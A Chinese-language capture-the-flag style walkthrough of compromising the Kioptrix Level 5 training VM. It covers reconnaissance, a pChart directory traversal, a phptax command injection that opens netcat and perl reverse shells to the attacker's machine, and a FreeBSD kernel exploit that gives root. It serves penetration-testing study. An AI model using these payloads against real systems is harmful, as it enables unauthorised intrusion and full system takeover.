本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Kioptrix-Level 5靶机有一个初步的了解
一、信息收集阶段
因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24
1、扫描网段,确认目标靶机
nmap -sP 192.168.60.0/24
2、扫描目标靶机详细信息
nmap -sT -sV -sC -O 192.168.60.167
# -sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
# -sV 尝试确定每个打开端口上运行的服务的版本
# -sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
3、爆破http目录
dirsearch -u 192.168.60.167 -x 404,403,400
4、whatweb对网站指纹信息扫描
whatweb -v 192.168.60.167
二、寻找攻击面及攻击阶段
1、访问首页及查看源码
2、访问目录枚举页面
3、搜索源码中cms框架相关历史漏洞
searchsploit pchart
4、下载cms框架漏洞exp文件并利用
(1)打开网页搜索cms框架漏洞下载https://www.exploit-db.com/
(2)下载的exp文件放到攻击机
(3)阅读下载的txt文件
(4)按照利用exp文件提示的目录进行访问
http://192.168.60.167/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
5、查看刚才信息收集阶段找到的8080端口页面
6、利用找到的cms框架文件遍历漏洞查看apache配置文件
(已知apache是2.2.21 freeBSD版本,上维基百科查询配置文件目录)
http://192.168.60.167/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf
#已知道apache版本2.2所以目录为:/usr/local/etc/apache22/httpd.conf
7、使用Burp 替换User-agent数据进行访问8080端口
#意思是我们需要这个User-Agent头 替换一下Burp数据包
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
User-Agent:Mozilla/4.0 Mozilla4_browser
注意:每个数据包都要替换User-Agent:(Mozilla/4.0 Mozilla4_browser)
8、查询下phptax有没有可以利用的漏洞
searchsploit phptax
9、下载漏洞exp文件并查看
searchsploit -m 21665.txt
cat 21665.txt
10、根据exp文件访问页面发送请求
(1)按照exp的payload发送请求
#攻击机监听23235端口
nc -lvvp 23235
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
http://192.168.60.167:8080/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
#burp数据包:
GET /phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make HTTP/1.1
Host: 192.168.60.167:8080
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
(2)我们写一个命令 whoami >/tmp/abc 使用之前的读取文件payload
GET /phptax/drawimage.php?pfilez=xxx;%20whoami%20%3e%2ftmp%2fabc;&pdf=make HTTP/1.1
Host: 192.168.60.167:8080
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
11、反弹其他shell尝试
nc -lvvp 4444
#攻击机创建
#反弹shell命令,一个不行就多试试其他的,可以用web扩展插件hack tool便捷的生成各种反弹shell
perl -e 'use Socket;$i="192.168.60.128";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.60.128:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
#这里我们使用第二条反弹shell(perl -MIO)命令连接成功
GET /phptax/drawimage.php?pfilez=xxx;perl%20-MIO%20-e%20'%24p%3dfork%3bexit%2cif(%24p)%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET(PeerAddr%2c%22192.168.60.128%3a4444%22)%3bSTDIN-%3efdopen(%24c%2cr)%3b%24~-%3efdopen(%24c%2cw)%3bsystem%24_%20while%3c%3e%3b';&pdf=make HTTP/1.1
Host: 192.168.60.167:8080
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
三、提权阶段
1、python创建交互式终端
2、查内核信息
uname -a
3、查找内核历史漏洞
searchsploit FreeBSD 9.0
4、下载漏洞exp
searchsploit -m 28718.c
5、kali攻击机上传exp
nc -lvvp 4455 < 28718.c
6、反弹shell靶机下载exp连接攻击机
nc -nv 192.168.60.128 4455 > 28718.c
7、查看靶机下载的exp文件
8、靶机编译、查看exp文件
gcc -o 1 28718.c
9、执行编译后的文件,获取root权限
./1
声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训课程有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!